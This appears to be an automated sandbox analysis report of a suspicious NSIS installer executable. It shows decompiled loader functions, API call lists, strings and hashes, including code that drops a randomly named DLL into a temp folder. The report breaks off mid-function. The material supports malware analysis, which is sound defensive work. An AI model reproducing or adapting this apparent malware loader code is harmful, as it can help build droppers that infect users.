                                        						__eflags = _v32 - 0x74736e49;
                                        						if(_v32 != 0x74736e49) {
                                        							goto L22;
                                        						}
                                        						__eflags = _v36 - 0x74666f73;
                                        						if(_v36 != 0x74666f73) {
                                        							goto L22;
                                        						}
                                        						__eflags = _v40 - 0x6c6c754e;
                                        						if(_v40 != 0x6c6c754e) {
                                        							goto L22;
                                        						}
                                        						_t89 = _v24;
                                        						__eflags = _t89 - _t101;
                                        						if(_t89 > _t101) {
                                        							goto L33;
                                        						}
                                        						_a4 = _a4 | _t94;
                                        						_t95 =  *0x789930; // 0x378da
                                        						__eflags = _a4 & 0x00000008;
                                        						 *0x7a2f8c = _t95;
                                        						if((_a4 & 0x00000008) != 0) {
                                        							L15:
                                        							_v12 = _v12 + 1;
                                        							_t24 = _t89 - 4; // 0x1c
                                        							_t101 = _t24;
                                        							__eflags = _t92 - _t101;
                                        							if(_t92 > _t101) {
                                        								_t92 = _t101;
                                        							}
                                        							goto L22;
                                        						}
                                        						__eflags = _a4 & 0x00000004;
                                        						if((_a4 & 0x00000004) != 0) {
                                        							break;
                                        						}
                                        						goto L15;
                                        						L22:
                                        						__eflags = _t101 -  *0x79d938; // 0x378de
                                        						if(__eflags < 0) {
                                        							_v16 = E00405D2F(_v16, 0x795938, _t92);
                                        						}
                                        						 *0x789930 =  *0x789930 + _t92;
                                        						_t101 = _t101 - _t92;
                                        						__eflags = _t101;
                                        					} while (_t101 > 0);
                                        					__eflags = _v8;
                                        					if(_v8 != 0) {
                                        						DestroyWindow(_v8);
                                        					}
                                        					goto L27;
                                        				}
                                        			}

                                        0x00402d72
                                        0x00402d75
                                        0x00402d7f
                                        0x00402d85
                                        0x00402d87
                                        0x00402da3
                                        0x00402da3
                                        0x00402d77
                                        0x00402d78
                                        0x00402d78
                                        0x00402d75
                                        0x00000000
                                        0x00402d70
                                        0x00402cf8
                                        0x00402cfd
                                        0x00402d00
                                        0x00402d06
                                        0x00000000
                                        0x00000000
                                        0x00402d0c
                                        0x00402d13
                                        0x00000000
                                        0x00000000
                                        0x00402d19
                                        0x00402d20
                                        0x00000000
                                        0x00000000
                                        0x00402d26
                                        0x00402d2d
                                        0x00000000
                                        0x00000000
                                        0x00402d2f
                                        0x00402d36
                                        0x00000000
                                        0x00000000
                                        0x00402d38
                                        0x00402d3b
                                        0x00402d3d
                                        0x00000000
                                        0x00000000
                                        0x00402d43
                                        0x00402d46
                                        0x00402d4c
                                        0x00402d50
                                        0x00402d56
                                        0x00402d5e
                                        0x00402d5e
                                        0x00402d61
                                        0x00402d61
                                        0x00402d64
                                        0x00402d66
                                        0x00402d68
                                        0x00402d68
                                        0x00000000
                                        0x00402d66
                                        0x00402d58
                                        0x00402d5c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402da6
                                        0x00402da6
                                        0x00402dac
                                        0x00402dbc
                                        0x00402dbc
                                        0x00402dbf
                                        0x00402dc5
                                        0x00402dc7
                                        0x00402dc7
                                        0x00402dcf
                                        0x00402dd3
                                        0x00402dd8
                                        0x00402dd8
                                        0x00000000
                                        0x00402dd3

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402C45
                                        • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                          • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                          • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                        • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                        • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                        Strings
                                        • Error launching installer, xrefs: 00402C8D
                                        • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                        • Inst, xrefs: 00402D19
                                        • verifying installer: %d%%, xrefs: 00402D89
                                        • "C:\Users\user\Desktop\Y4U48592345670954.exe" , xrefs: 00402C41
                                        • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                        • Null, xrefs: 00402D2F
                                        • soft, xrefs: 00402D26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                        • String ID: "C:\Users\user\Desktop\Y4U48592345670954.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                        • API String ID: 2181728824-61314569
                                        • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                        • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                        • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                        • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E0040179D(FILETIME* __ebx, void* __eflags) {
                                        				void* _t33;
                                        				void* _t41;
                                        				void* _t43;
                                        				long _t49;
                                        				long _t62;
                                        				signed char _t63;
                                        				long _t64;
                                        				void* _t66;
                                        				long _t72;
                                        				FILETIME* _t73;
                                        				FILETIME* _t77;
                                        				signed int _t79;
                                        				void* _t82;
                                        				CHAR* _t84;
                                        				void* _t87;
                                        
                                        				_t77 = __ebx;
                                        				_t84 = E00402A9A(0x31);
                                        				 *(_t87 - 0x34) = _t84;
                                        				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
                                        				_t33 = E00405538(_t84);
                                        				_push(_t84);
                                        				if(_t33 == 0) {
                                        					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                        				} else {
                                        					_push(0x409c18);
                                        					E004059BF();
                                        				}
                                        				E00405BFB(0x409c18);
                                        				while(1) {
                                        					__eflags =  *(_t87 + 8) - 3;
                                        					if( *(_t87 + 8) >= 3) {
                                        						_t66 = E00405C94(0x409c18);
                                        						_t79 = 0;
                                        						__eflags = _t66 - _t77;
                                        						if(_t66 != _t77) {
                                        							_t73 = _t66 + 0x14;
                                        							__eflags = _t73;
                                        							_t79 = CompareFileTime(_t73, _t87 - 0x18);
                                        						}
                                        						asm("sbb eax, eax");
                                        						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                        						__eflags = _t72;
                                        						 *(_t87 + 8) = _t72;
                                        					}
                                        					__eflags =  *(_t87 + 8) - _t77;
                                        					if( *(_t87 + 8) == _t77) {
                                        						_t63 = GetFileAttributesA(0x409c18); // executed
                                        						_t64 = _t63 & 0x000000fe;
                                        						__eflags = _t64;
                                        						SetFileAttributesA(0x409c18, _t64); // executed
                                        					}
                                        					__eflags =  *(_t87 + 8) - 1;
                                        					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
                                        					__eflags = _t41 - 0xffffffff;
                                        					 *(_t87 - 8) = _t41;
                                        					if(_t41 != 0xffffffff) {
                                        						break;
                                        					}
                                        					__eflags =  *(_t87 + 8) - _t77;
                                        					if( *(_t87 + 8) != _t77) {
                                        						E00404D62(0xffffffe2,  *(_t87 - 0x34));
                                        						__eflags =  *(_t87 + 8) - 2;
                                        						if(__eflags == 0) {
                                        							 *((intOrPtr*)(_t87 - 4)) = 1;
                                        						}
                                        						L31:
                                        						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
                                        						__eflags =  *0x7a3008;
                                        						goto L32;
                                        					} else {
                                        						E004059BF(0x40a418, 0x7a4000);
                                        						E004059BF(0x7a4000, 0x409c18);
                                        						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll",  *((intOrPtr*)(_t87 - 0x10)));
                                        						E004059BF(0x7a4000, 0x40a418);
                                        						_t62 = E004052BF("C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll",  *(_t87 - 0x24) >> 3) - 4;
                                        						__eflags = _t62;
                                        						if(_t62 == 0) {
                                        							continue;
                                        						} else {
                                        							__eflags = _t62 == 1;
                                        							if(_t62 == 1) {
                                        								 *0x7a3008 =  *0x7a3008 + 1;
                                        								L32:
                                        								_t49 = 0;
                                        								__eflags = 0;
                                        							} else {
                                        								_push(0x409c18);
                                        								_push(0xfffffffa);
                                        								E00404D62();
                                        								L29:
                                        								_t49 = 0x7fffffff;
                                        							}
                                        						}
                                        					}
                                        					L33:
                                        					return _t49;
                                        				}
                                        				E00404D62(0xffffffea,  *(_t87 - 0x34));
                                        				 *0x4092a0 =  *0x4092a0 + 1;
                                        				_push(_t77);
                                        				_push(_t77);
                                        				_push( *(_t87 - 8));
                                        				_push( *((intOrPtr*)(_t87 - 0x1c)));
                                        				_t43 = E00402EBD(); // executed
                                        				 *0x4092a0 =  *0x4092a0 - 1;
                                        				__eflags =  *(_t87 - 0x18) - 0xffffffff;
                                        				_t82 = _t43;
                                        				if( *(_t87 - 0x18) != 0xffffffff) {
                                        					L22:
                                        					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
                                        				} else {
                                        					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
                                        					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
                                        						goto L22;
                                        					}
                                        				}
                                        				FindCloseChangeNotification( *(_t87 - 8)); // executed
                                        				__eflags = _t82 - _t77;
                                        				if(_t82 >= _t77) {
                                        					goto L31;
                                        				} else {
                                        					__eflags = _t82 - 0xfffffffe;
                                        					if(_t82 != 0xfffffffe) {
                                        						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
                                        					} else {
                                        						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
                                        						lstrcatA(0x409c18,  *(_t87 - 0x34));
                                        					}
                                        					_push(0x200010);
                                        					_push(0x409c18);
                                        					E004052BF();
                                        					goto L29;
                                        				}
                                        				goto L33;
                                        			}


                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                        • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                        • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                        • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll$Ivlfdpdlcleoxmzl
                                        • API String ID: 1152937526-1841927513
                                        • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                        • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                        • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                        • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                        				struct _OVERLAPPED* _v8;
                                        				long _v12;
                                        				void* _v16;
                                        				long _v20;
                                        				long _v24;
                                        				intOrPtr _v28;
                                        				char _v92;
                                        				void* _t68;
                                        				void* _t69;
                                        				int _t74;
                                        				long _t75;
                                        				intOrPtr _t79;
                                        				long _t80;
                                        				void* _t82;
                                        				int _t84;
                                        				void* _t99;
                                        				void* _t100;
                                        				long _t101;
                                        				int _t102;
                                        				long _t103;
                                        				int _t104;
                                        				intOrPtr _t105;
                                        				long _t106;
                                        				void* _t107;
                                        				int _t66;   /* temporaries used below but left undeclared by the decompiler */
                                        				int* _t13;
                                        
                                        				_t102 = _a16;
                                        				_t99 = _a12;
                                        				_v12 = _t102;
                                        				if(_t99 == 0) {
                                        					_v12 = 0x8000;
                                        				}
                                        				_v8 = 0;
                                        				_v16 = _t99;
                                        				if(_t99 == 0) {
                                        					_v16 = 0x78d938;
                                        				}
                                        				_t66 = _a4;
                                        				if(_a4 >= 0) {
                                        					E004030FF( *0x7a2fd8 + _t66);
                                        				}
                                        				_t68 = E004030CD( &_a16, 4); // executed
                                        				if(_t68 == 0) {
                                        					L44:
                                        					_push(0xfffffffd);
                                        					goto L45;
                                        				} else {
                                        					if((_a19 & 0x00000080) == 0) {
                                        						if(_t99 != 0) {
                                        							if(_a16 < _t102) {
                                        								_t102 = _a16;
                                        							}
                                        							if(E004030CD(_t99, _t102) != 0) {
                                        								_v8 = _t102;
                                        								L47:
                                        								return _v8;
                                        							} else {
                                        								goto L44;
                                        							}
                                        						}
                                        						if(_a16 <= 0) {
                                        							goto L47;
                                        						}
                                        						while(1) {
                                        							_t103 = _v12;
                                        							if(_a16 < _t103) {
                                        								_t103 = _a16;
                                        							}
                                        							if(E004030CD(0x789938, _t103) == 0) {
                                        								goto L44;
                                        							}
                                        							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
                                        							if(_t74 == 0 || _t103 != _a12) {
                                        								L30:
                                        								_push(0xfffffffe);
                                        								L45:
                                        								_pop(_t69);
                                        								return _t69;
                                        							} else {
                                        								_v8 = _v8 + _t103;
                                        								_a16 = _a16 - _t103;
                                        								if(_a16 > 0) {
                                        									continue;
                                        								}
                                        								goto L47;
                                        							}
                                        						}
                                        						goto L44;
                                        					}
                                        					_t75 = GetTickCount();
                                        					_t13 =  &_a16;
                                        					 *_t13 = _a16 & 0x7fffffff;
                                        					_v20 = _t75;
                                        					 *0x40b038 = 0xb;
                                        					 *0x40b050 = 0;
                                        					_a4 = _a16;
                                        					if( *_t13 <= 0) {
                                        						goto L47;
                                        					}
                                        					while(1) {
                                        						L10:
                                        						_t104 = 0x4000;
                                        						if(_a16 < 0x4000) {
                                        							_t104 = _a16;
                                        						}
                                        						if(E004030CD(0x789938, _t104) == 0) {
                                        							goto L44;
                                        						}
                                        						_a16 = _a16 - _t104;
                                        						 *0x40b028 = 0x789938;
                                        						 *0x40b02c = _t104;
                                        						while(1) {
                                        							_t100 = _v16;
                                        							 *0x40b030 = _t100;
                                        							 *0x40b034 = _v12;
                                        							_t79 = E00405D9D(0x40b028);
                                        							_v28 = _t79;
                                        							if(_t79 < 0) {
                                        								break;
                                        							}
                                        							_t105 =  *0x40b030; // 0x78e938
                                        							_t106 = _t105 - _t100;
                                        							_t80 = GetTickCount();
                                        							_t101 = _t80;
                                        							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                        								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                        								_t107 = _t107 + 0xc;
                                        								E00404D62(0,  &_v92);
                                        								_v20 = _t101;
                                        							}
                                        							if(_t106 == 0) {
                                        								if(_a16 > 0) {
                                        									goto L10;
                                        								}
                                        								goto L47;
                                        							} else {
                                        								if(_a12 != 0) {
                                        									_v12 = _v12 - _t106;
                                        									_v8 = _v8 + _t106;
                                        									_t82 =  *0x40b030; // 0x78e938
                                        									_v16 = _t82;
                                        									if(_v12 < 1) {
                                        										goto L47;
                                        									}
                                        									L25:
                                        									if(_v28 != 4) {
                                        										continue;
                                        									}
                                        									goto L47;
                                        								}
                                        								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                        								if(_t84 == 0 || _v24 != _t106) {
                                        									goto L30;
                                        								} else {
                                        									_v8 = _v8 + _t106;
                                        									goto L25;
                                        								}
                                        							}
                                        						}
                                        						_push(0xfffffffc);
                                        						goto L45;
                                        					}
                                        					goto L44;
                                        				}
                                        			}

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402F1F
                                        • GetTickCount.KERNEL32 ref: 00402FA6
                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                        • wsprintfA.USER32 ref: 00402FE3
                                        • WriteFile.KERNELBASE(00000000,00000000,0078E938,7FFFFFFF,00000000), ref: 00403011
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CountTick$FileWritewsprintf
                                        • String ID: ... %d%%$8x
                                        • API String ID: 4209647438-795837185
                                        • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                        • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                        • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                        • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 0284152A
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02841589
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID: AllocCreateFileVirtual
                                        • String ID: 230fc8508bdb4912ad5d95967b73d200
                                        • API String ID: 1475775534-2327637551
                                        • Opcode ID: 0f8b0954afaee3e2d7d39e35a3e06a42f8be76c1b20ad684bca408e5066ec7e2
                                        • Instruction ID: 3bb9e81587943ba8efac719381c75a0c7469d936bcf2d5b1d4254782b4751488
                                        • Opcode Fuzzy Hash: 0f8b0954afaee3e2d7d39e35a3e06a42f8be76c1b20ad684bca408e5066ec7e2
                                        • Instruction Fuzzy Hash: 48E15B28D5439CEEEB61DBE4DC09BEDBBB5AF04714F10408AE60CFA191D7B50A84DB16
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02840825
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 028409F2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID: CreateFileFreeVirtual
                                        • String ID:
                                        • API String ID: 204039940-0
                                        • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
                                        • Instruction ID: ae88ed338c3e621cea829f0dd0a7684b537f2363d9f83db275578220bdd54369
                                        • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
                                        • Instruction Fuzzy Hash: 12A1F339D0020DEFEF14DFE4C985BAEBBB1AF08316F204456E604FA291DB745A90DB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                                        				int _t19;
                                        				struct _SECURITY_ATTRIBUTES* _t20;
                                        				signed char _t22;
                                        				struct _SECURITY_ATTRIBUTES* _t23;
                                        				CHAR* _t25;
                                        				struct _SECURITY_ATTRIBUTES** _t27;
                                        				struct _SECURITY_ATTRIBUTES** _t29;
                                        				void* _t30;
                                        
                                        				_t23 = __ebx;
                                        				_t25 = E00402A9A(0xfffffff0);
                                        				_t27 = E0040555F(_t25);
                                        				if( *_t25 != __ebx && _t27 != __ebx) {
                                        					do {
                                        						_t29 = E004054F7(_t27, 0x5c);
                                        						 *_t29 = _t23;
                                        						 *((char*)(_t30 + 0xb)) =  *_t29;
                                        						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                        						if(_t19 == 0) {
                                        							if(GetLastError() != 0xb7) {
                                        								L5:
                                        								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                        							} else {
                                        								_t22 = GetFileAttributesA(_t25); // executed
                                        								if((_t22 & 0x00000010) == 0) {
                                        									goto L5;
                                        								}
                                        							}
                                        						}
                                        						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                        						 *_t29 = _t20;
                                        						_t27 =  &(_t29[0]);
                                        					} while (_t20 != _t23);
                                        				}
                                        				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                        					_push(0xfffffff5);
                                        					E00401428();
                                        				} else {
                                        					E00401428(0xffffffe6);
                                        					E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                                        					SetCurrentDirectoryA(_t25); // executed
                                        				}
                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
                                        				return 0;
                                        			}

                                        APIs
                                          • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 0040556D
                                          • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                          • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 3751793516-47812868
                                        • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                        • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                        • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                        • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                        				signed int _t11;
                                        				int _t14;
                                        				signed int _t16;
                                        				void* _t19;
                                        				CHAR* _t20;
                                        
                                        				_t20 = _a4;
                                        				_t19 = 0x64;
                                        				while(1) {
                                        					_t19 = _t19 - 1;
                                        					_a4 = 0x61736e;
                                        					_t11 = GetTickCount();
                                        					_t16 = 0x1a;
                                        					_a6 = _a6 + _t11 % _t16;
                                        					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
